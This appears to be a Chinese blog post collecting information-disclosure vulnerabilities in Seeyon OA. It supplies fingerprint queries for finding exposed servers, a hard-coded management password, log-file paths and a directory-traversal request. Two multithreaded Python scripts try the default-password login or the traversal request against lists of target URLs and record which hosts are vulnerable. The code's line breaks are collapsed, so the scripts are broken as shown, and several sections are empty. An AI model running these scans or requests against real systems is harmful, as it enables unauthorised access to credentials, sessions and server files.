文章目录

  • 前言
  • 敏感信息泄露
    • A6 status.jsp 信息泄露漏洞
      • 漏洞描述
      • 漏洞影响
      • 网络测绘
      • 漏洞复现
      • POC 批量检测
    • getSessionList.jsp Session泄漏漏洞
      • 漏洞描述
      • 网络测绘
      • 批量检测POC
    • 致远OA 帆软组件 ReportServer 目录遍历漏洞
      • 漏洞描述
      • 漏洞影响
      • 网络测绘
      • POC(批量检测)
    • A6 createMysql.jsp 数据库敏感信息泄露漏洞
    • A6 DownExcelBeanServlet 用户敏感信息漏洞
    • A6 initDataAssess.jsp 用户敏感信息漏洞
    • A6 config.jsp 敏感信息泄漏漏洞

前言

用友致远OA协同管理软件为企事业组织提供了一个协同办公门户和管理平台,涵盖了组织运营涉及的协作管理、审批管理、资源管理、知识管理、文化管理、公文管理等内容,支持企事业组织的信息化扩展应用,能有效帮助组织解决战略落地、文化建设、规范管理、资源整合、运营管控等难题,是组织管理的最佳实践。

产品系列: A3、A6、A8
品牌: 用友
对象: 微型、小型企业、企业部门级

敏感信息泄露

A6 status.jsp 信息泄露漏洞

漏洞描述

致远OA A8-m 存在状态监控页面信息泄露,攻击者可以从其中获取网站路径和用户名等敏感信息进一步攻击

漏洞影响

致远OA A8-m

网络测绘

title=“A8-m”

漏洞复现

访问监控页面

/seeyon/management/status.jsp
后台密码为 WLCCYBD@SEEYON
登录后通过如下url获得一些敏感信息

/seeyon/management/status.jsp
/seeyon/logs/login.log
/seeyon/logs/v3x.log

POC 批量检测

思路:python post发包登陆,头部location:会进行跳转以及状态码一般为302

# -*- coding: utf-8 -*-
'''
@Time    : 2023-03-18 11:14
@Author  : whgojp
@File    : POC.py'''
import requests
from threading import ThreadTHREAD_NUM = 10password = 'WLCCYBD@SEEYON'with open('urls.txt', 'r') as f:urls = [url.strip() for url in f.readlines()]def check_url(url):if 'https' not in url:url = 'http://' + urltry:# 发送POST请求headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','Accept-Encoding': 'gzip, deflate','Referer': url + '/seeyon/management/index.jsp',}response = requests.post(url + '/seeyon/management/index.jsp', data={'password': password}, headers=headers,allow_redirects=False)# 判断是否登录成功if response.status_code == 302 and 'Location' in response.headers and response.headers['Location'].endswith('/seeyon/management/status.jsp'):# 登录成功,输出URLprint(url + ' is vulnerable')with open("result.txt", "a") as f:f.write(f"{url} is vulnerable.\n")else:# 登录失败passexcept:# 出现异常passthreads = []
for i in range(THREAD_NUM):thread_urls = urls[i::THREAD_NUM]thread = Thread(target=lambda urls: [check_url(url) for url in urls], args=(thread_urls,))threads.append(thread)for thread in threads:thread.start()for thread in threads:thread.join()

getSessionList.jsp Session泄漏漏洞

漏洞描述

通过使用存在漏洞的请求时,会回显部分用户的Session值,导致出现任意登录的情况

网络测绘

app=“致远互联-OA”

批量检测POC

致远OA 帆软组件 ReportServer 目录遍历漏洞

漏洞描述

致远OA 帆软组件 ReportServer接口存在目录遍历漏洞,攻击者通过漏洞可以获取服务器敏感信息

漏洞影响

致远OA 帆软组件

网络测绘

title=“致远A8-V5协同管理软件 V6.1sp1”

POC(批量检测)

# -*- coding: utf-8 -*-
'''
@Time    : 2023-03-20 16:53
@Author  : whgojp
@File    : POC.py
'''
import requests
import threading
def check_url(url, counter):if 'https' not in url:url = 'http://'+urltry:url = url + '/seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../&currentUserName=admin&currentUserId=1&isWebReport=true 'response = requests.get(url, timeout=5)if response.status_code == 200:print(f"{url} is accessible.")with open("result.txt", "a") as f:f.write(f"{url} is accessible.\n")else:passexcept requests.exceptions.RequestException as e:passcounter[0] += 1print(f"Scanning progress: {counter[0]}/{counter[1]}")urls = []
with open("urls.txt", "r") as f:for line in f:urls.append(line.strip())
threads = []
counter = [0, len(urls)]
for url in urls:thread = threading.Thread(target=check_url, args=(url, counter))thread.start()threads.append(thread)
for thread in threads:thread.join()



如果要读取文件进行目录遍历,只需要更改file_path就行了

A6 createMysql.jsp 数据库敏感信息泄露漏洞

待续

A6 DownExcelBeanServlet 用户敏感信息漏洞

A6 initDataAssess.jsp 用户敏感信息漏洞

A6 config.jsp 敏感信息泄漏漏洞

致远OA敏感信息泄露漏洞合集(含批量检测POC)相关推荐

  1. 致远OA 文件上传漏洞

    报告编号:B6-2021-010801 报告来源:360CERT 报告作者:360CERT 更新日期:2021-01-08 0x01漏洞简述 2021年01月08日,360CERT监测发现致远OA发布 ...

  2. 致远OA文件上传漏洞(含批量检测POC)

    文章目录 文件上传 wpsAssistServlet 任意文件上传 漏洞描述 漏洞影响 网络测绘 批量检测POC ajax.do 任意文件上传 CNVD-2021-01627漏洞 漏洞描述 漏洞影响 ...

  3. 配置snmp_多种设备基于 SNMP 协议的敏感信息泄露漏洞数据分析报告

    作者:知道创宇404实验室 1. 更新情况 2. 事件概述 SNMP协议[1],即简单网络管理协议(SNMP,Simple Network Management Protocol),默认端口为 161 ...

  4. weblogic中间件WLS(bea_wls_internal)组件敏感信息泄露漏洞整改

    近期负责的系统weblogic中间件bea_wls_internal被查出存在wls组件敏感信息泄露漏洞,访问漏洞地址如下: 针对上述漏洞,做过如下测试,整改未生效. 删除bea_wls_intern ...

  5. 【Web安全从入门到放弃】11_目录遍历和敏感信息泄露漏洞

    11_目录遍历和敏感信息泄露漏洞 目录遍历漏洞概述 在web功能设计中,很多时候我们会要将需要访问的文件定义成变量,从而让前端的功能便的更加灵活.当用户发起一个前端的请求时,便会将请求的这个文件的值( ...

  6. Goby漏洞更新 | MinIO verify 接口敏感信息泄露漏洞(CVE-2023-28432)

    Goby预置了最具攻击效果的漏洞引擎,覆盖Weblogic,Tomcat等最严重漏洞.每天从互联网(如CVE)会产生大量的漏洞信息,我们筛选了会被用于真实攻击的漏洞进行每日更新.Goby也提供了可以自 ...

  7. 三、敏感信息泄露漏洞

    敏感信息泄露漏洞 一.漏洞简述 敏感信息泄露漏洞是指在业务系统中对保密性要求较高的数据泄露 二.数据类型 1.网站传输过程数据 2.数据库存储的数据 3.浏览器的交互数据 三.信息分类 1.系统敏感信 ...

  8. 致远a8-v5-6.0协同管理软件_高危漏洞利用预警:近期利用“致远OA任意文件写入漏洞”的攻击较多...

    概述腾讯御界高级威胁检测系统近期监测到"致远OA系统上的GetShell漏洞"在网上被频繁利用攻击政企客户. 对于存在漏洞的OA系统,攻击者无需任何权限,即可向服务器上传websh ...

  9. 致远OA任意文件下载漏洞(CNVD-2020-62422)

    文章目录 漏洞描述 影响版本 payload poc 漏洞复现 修复补丁 漏洞描述 致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息 影响版本 致远OA A6-V5 致远OA ...

最新文章

  1. 简练软考知识点整理-范围确认易混概念
  2. 如何在 5 分钟内建立一个数据驱动的新型冠状病毒肺炎应用程序
  3. linux内核启动时间优化
  4. corosync+pacemaker在centos7上的安装,配置简述
  5. 实际编程题----CT扫描
  6. 英语口语-文章朗读Week10 Thursday
  7. python修改xml属性值_根据其属性查找xml元素并更改其值
  8. J2EE部署项目至Tomcat报错 Unable to read TLD META-INF/c tld
  9. jQuery导入Eclipse后报错解决方法
  10. 施耐德plc地址对应modbus_第446期丨PLC与HMI脚本数据类型交换;继电器触点烧死问题原因分析...
  11. c++ idea 插件_推荐 33 个 IDEA 最牛配置,写代码太爽了
  12. oracle财务系统表,Oracle财务管理系统:会计业务周期
  13. 创建VSIX项目模板
  14. Pinterest和Instagram哪个更好用?姐妹还是天敌...
  15. 关于nuxt sass-loader 报错 in ./pages/index.vue?vuetype=styleindex=0id=2a183b29lang=scssscoped=true
  16. C++课程设计:学生管理系统
  17. 共享租赁汽车,必将重新设计中国汽车产业链游戏规则
  18. erase和remove
  19. 河北师范大学matlab,赵欣老师简介
  20. xcode 如何添加调试设备

热门文章

  1. [Android Studio]报错error:failed linking references的解决方案以及有关gradle和sdk版本号的思考
  2. 苹果电脑可以进行数据恢复吗
  3. 完美解决 Adobe Acrobat XI安装后闪退和停止工作问题
  4. saxon 使用_使用Saxon-CE和HL7 CDA实施客户端医疗保健应用程序
  5. Java super关键字:super调用父类的构造方法、利用super访问父类成员
  6. Oracle:用_minimum_giga_scn 解决无法启动的数据库
  7. 新晋产能巨人特斯拉:Giga Texas 45秒一辆新车
  8. python Homework03
  9. 阿里云、腾讯云、百度云、京东云、华为云、盛大云、ucloud他们之间优势分别是?
  10. 小游戏制作——打气球小游戏